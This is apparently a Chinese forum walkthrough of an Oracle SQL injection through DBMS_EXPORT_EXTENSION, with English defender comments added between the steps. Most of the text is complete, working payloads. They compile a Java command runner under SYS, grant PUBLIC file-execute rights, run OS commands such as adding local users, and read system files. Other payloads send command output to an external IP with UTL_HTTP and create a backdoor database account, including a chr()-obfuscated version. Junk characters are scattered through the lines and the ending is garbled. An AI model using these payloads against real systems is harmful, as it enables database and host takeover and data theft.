以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
+ x! s4 ~. S) w! j, P. v6 x9 e7 y5 ]; {
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 5 N8 @6 Q0 n0 U9 b5 z
的形式即可。(用" 'a'|| "是为了让语句返回true值)
语句有点长,可能要用post提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
" O( S# D$ D1 A/xxx.jsp?id=1 and '1'<>'a'||( ( t6 U8 s) R8 Z8 ~
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ X0 S. s# s; ?2 o
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
8 k: H7 X6 i8 `. e* L6 qnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}3 _6 X3 I6 ], p: K- G
}'''';END;'';END;--','SYS',0,'1',0) from dual ! F* H/ `" K4 O. ?
) , {; [( f( m4 W, V/ ?0 m3 L
------------------------ $ G! w8 R# B _
如果url有长度限制,可以把readFile()函数块去掉,即:
-- Shortened form of step 1 (readFile omitted to fit URL length limits); same
-- injection vector and same resulting `LinxUtil.runCMD` under SYS.
-- Defender notes: length-trimmed variants mean a detection rule keyed only on
-- the readFile / FilePermission part would miss this. Key instead on the
-- DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES call with a quote-breaking
-- third argument, or on CREATE JAVA SOURCE issued from an application session.
/xxx.jsp?id=1 and '1'<>'a'||(
9 m- {0 f6 R @( Oselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 m+ W) w' E' h% Ecreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
* S m0 U5 b" |' f T* p$ Rnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}) ^# G% b0 L5 V# f+ R" `
}'''';END;'';END;--','SYS',0,'1',0) from dual
4 |# j0 X) ]/ h9 r) 6 Q8 q6 A$ o7 [
同时把后面步骤 提到的 对readFile()的处理语句去掉。
" C+ Y8 b; v1 i& g W------------------------------ + }6 m- v/ o6 P( u( A5 ]: I
2.赋Java权限
-- Step 2: through the same vector, DBMS_JAVA.GRANT_PERMISSION gives PUBLIC a
-- java.io.FilePermission on <<ALL FILES>> with action "execute" — presumably
-- the permission the database JVM's policy demands before Runtime.exec is
-- allowed, since the walkthrough performs it before any command is run.
-- Defender notes: this grant persists independently of the LinxUtil objects;
-- review the Java policy (DBA_JAVA_POLICY) for PUBLIC grants on <<ALL FILES>>
-- and treat any such entry as a compromise indicator.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual2 |; p; L0 [8 Q- x' r( f
3.创建函数
-- Step 3: two PL/SQL wrappers, LinxRunCMD and LinxReadFile, are created in the
-- SYS schema and bound with `language java name` to LinxUtil.runCMD/readFile.
-- Defender notes: these are the objects the walkthrough later looks up by name
-- (LINXRUNCMD / LINXREADFILE in ALL_OBJECTS). More generally, any SYS-owned
-- function whose body is `language java name` pointing at a class that is not
-- part of the product is worth a look.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; M/ P; }) W/ V0 lcreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual* o) |3 E/ @8 F9 x' w6 Z1 O+ e7 K
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
9 E( z4 A' o9 [& p- t: L. p. M+ {create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
-- Step 4: `grant all on ... to public` makes both SYS-owned wrappers callable
-- by every database account, not only through the injection point.
-- Defender notes: audit object grants TO PUBLIC on SYS-owned functions
-- (DBA_TAB_PRIVS with grantee = 'PUBLIC'); revoke and drop on discovery.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual! \+ e* h+ C1 D$ N
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5.测试上面的几步是否成功
-- Step 5: boolean check that the objects now exist, by nesting a lookup of
-- ALL_OBJECTS.OBJECT_ID for LINXRUNCMD / LINXREADFILE into the injected
-- condition (the page behaves differently when the subquery returns a row).
-- Defender notes: the same lookup, run as a DBA, is a cheap post-incident
-- check, but the LINX prefix is only this walkthrough's naming convention —
-- check for unexpected SYS-owned objects rather than for this name.
! k, X7 M% h. X6 Iand '1'<>'11'||( % o3 i6 e1 d& T* A
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
0 N6 j% i7 `8 H% E6 W) . M8 `3 r' r u- C2 o
and '1'<>(
: |& Z) S3 S) Z; U& tselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' 5 T# X4 @6 U$ X3 ~
)
6.执行命令:
-- Step 6: calling the SYS-owned wrappers from the injection point. The first
-- runs an OS command on the database host (a local account creation via
-- `net user ... /add`), the second reads c:/boot.ini — the database service's
-- OS privileges are now reachable from the web tier.
-- Defender notes: a database host creating local OS accounts is a loud signal;
-- correlate OS account-creation events with database sessions from the
-- application account. Running the database service under a low-privilege OS
-- account limits what Runtime.exec can do if this stage is reached.
2 j! X8 Y5 }% v% X9 q1 f/xxx.jsp?id=1 and '1'<>( 2 O1 r; |! |4 C F9 z0 z$ A- z
select sys.LinxRunCMD('cmd /c net user linx /add') from dual % _, s7 U7 T; h9 H% N* ?* C
5 L8 |( d* \9 K% s: Q: r+ r2 J
)
0 i d, Z* D2 R. Z' X/xxx.jsp?id=1 and '1'<>( : L, f# f% P* z4 ~5 Q
select sys.LinxReadFile('c:/boot.ini') from dual7 \" J; ]8 ^, h2 u, x9 z$ A6 l
8 @7 H- R' `* v( r" r7 Y5 q)
. F9 j( O" P+ ?1 p- U B
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
-- Variant of step 6 using UNION so the command output is rendered in the page
-- instead of being inferred from a true/false condition.
-- Defender notes: command output appearing in HTTP responses is visible to
-- response logging, and the in-band form means `sys.LinxRunCMD(` appears
-- verbatim in the request parameter and can be matched directly.
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者UTL_HTTP.request():
-- Out-of-band variant: the output of LinxRunCMD / LinxReadFile is URL-escaped
-- (spaces and newlines via REPLACE) and sent as a query string to an external
-- host with UTL_HTTP.request, so nothing has to be rendered by the web page.
-- The destination listed here is presumably the author's own collector.
-- Defender notes: this needs outbound HTTP from the database server — egress
-- filtering and, on releases that support them, network ACLs for UTL_HTTP
-- blunt it; outbound requests from the DB host to unfamiliar hosts carrying
-- command output are a strong incident indicator.
/xxx.jsp?id=1 and '1'<>(
/ O3 Y+ K7 e, o9 Y- hSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual7 f* _( I: n1 a
) 7 T' k" `! `& K- \1 ~
/xxx.jsp?id=1 and '1'<>(
- Y9 M2 Q' n$ S% E* X" VSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
$ B+ o$ p2 U& e' D9 })
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
--------------------
6.内部变化
通过以下命令可以查看all_objects表的改变:
-- "Internal changes" check: lists every object whose name contains LINX or
-- Linx. Both patterns are needed because the Java source was created with a
-- quoted identifier ("LinxUtil"), which keeps its mixed case, while the
-- unquoted functions are stored upper-case (LINXRUNCMD, LINXREADFILE).
-- Defender notes: as with step 5, the name is only this author's convention;
-- hunt for unexpected SYS-owned JAVA SOURCE / JAVA CLASS objects and
-- `language java` functions rather than for a name fragment.
j: V5 S& y: P2 |" w% s: eselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
7.删除我们创建的函数
-- Step 7 ("cleanup"): drops only the LinxRunCMD wrapper.
-- Defender notes: after this step LinxReadFile, the "LinxUtil" Java source and
-- class, and the PUBLIC java.io.FilePermission grant from step 2 are all still
-- in place, so the absence of LINXRUNCMD does not mean the database is clean.
6 {# j! b) S, F' {select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; z% q' ^5 v9 d T) W2 H8 R- L
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
6 A6 s' ~/ Q, ^- v====================================================
, ?; s! k. A3 K全文结束。谨以此文赠与我的朋友。 . h( Q( V: C' t$ \
linx f3 L! I, s" q% x4 [. x1 a
124829445 + Q1 u. O) M, O9 J
2008.1.12
; ]" R8 n }; W0 Blinyujian@bjfu.edu.cn . h+ M9 W* H& t) v* ?) _
====================================================================== . @- b9 a! f9 f
测试漏洞的另一方法:
创建oracle帐号:
-- Alternative vulnerability test: creates a database user (linxsql / linxsql)
-- through the same DBMS_EXPORT_EXTENSION vector. CREATE USER needs a
-- privilege the application account should not have, so success confirms the
-- injected DDL runs with the package owner's rights.
-- Defender notes: unexpected rows in DBA_USERS with recent CREATED timestamps,
-- especially originating from an application session, should be treated as an
-- incident; the fixed, guessable password here is also a backdoor credential.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 u0 x3 f0 E: J5 ?( i {
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual- R S2 ^& C. z+ \$ G
即:
-- The same CREATE USER payload with every character built from chr()||chr()...
-- so the request contains no quote characters. (The encoded text also uses a
-- `:P1` bind placeholder in the DBMS_OUTPUT".PUT(...) prefix where the plain
-- version above uses a literal 1.)
-- Defender notes: a filter that only looks for quote characters or for the
-- package name in plain text misses this form; normalise/decode chr()
-- concatenations before matching, or alert on long chr() chains in parameters.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),. I( K5 }# ^: X7 p7 H4 {
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual # R% k8 j7 f* D$ T
确定漏洞存在:
-- Confirms the previous step: ALL_USERS.USER_ID for LINXSQL is compared with a
-- number, so the injected condition flips when the user exists. This is the
-- numeric `1<>(...)` form the page contrasts with the string `'1'<>(...)` form
-- needed for varchar results.
-- Defender notes: the same lookup run by a DBA is a quick check for the
-- account this walkthrough creates.
1 `7 ?& L# U9 B ^" c1<>( , z1 }8 D5 E, t' _
select user_id from all_users where username='LINXSQL' 5 F1 y, g$ k: h, O
)
给linxsql连接权限:
-- Grants CONNECT to the newly created user so it can log in directly, turning
-- the web injection into a standing database login.
-- Defender notes: a direct login by this account would appear as a new session
-- from a non-application client; review DBA_ROLE_PRIVS for recent grants to
-- unfamiliar accounts alongside the DBA_USERS check above.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 M. V4 ?, A; P5 W/ p' R
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual ; I) d( l* d) I) C- }& g. f7 s
删除帐号:
-- Removes the test account (this variant of the prefix uses the `:P1` bind
-- placeholder rather than a literal 1).
-- Defender notes: where auditing is enabled, dropping the user does not remove
-- the audit-trail or listener-log records of its creation and logins; those
-- remain the primary artifacts to preserve.
! u6 Q' ~& T" m& E3 U mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''! C; Q- H/ H: b# C4 Y# Y
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual ( K7 q; r' I- Z8 v& b$ O7 x( q% V
====================== 3 Z% | G0 _, e3 j9 J. Q
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用的话可以考虑grant dba to 当前的User:
-- Creates Linx_query(p): a SYS-owned function that runs its argument via
-- EXECUTE IMMEDIATE and returns 1. It is declared `authid current_user`, so,
-- as the page itself notes, it executes with the caller's privileges rather
-- than SYS's, which is why the author finds it of limited use from the
-- application account.
-- Defender notes: an `authid current_user` function wrapping EXECUTE IMMEDIATE
-- on its argument is still a generic statement-execution primitive for any
-- account that can call it; hunt for this shape among SYS-owned functions.
1.jsp?id=1 and '1'<>( 9 }% t2 s$ X/ n* S9 u6 r1 ]4 @: ^% F7 B
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& D+ ]1 g3 x* j. Y; |# j
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
& k4 P5 {0 p( C) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE- x. h7 r9 h( F# c
)9 u+ `: @( y' P4 }6 I
2 E: M/ c# B; e' w
. s( ]9 t& _9 ?: x5 Z2 F6 f
6 T0 g1 ^# b) S4 y5 D) B" P' _7 i' y |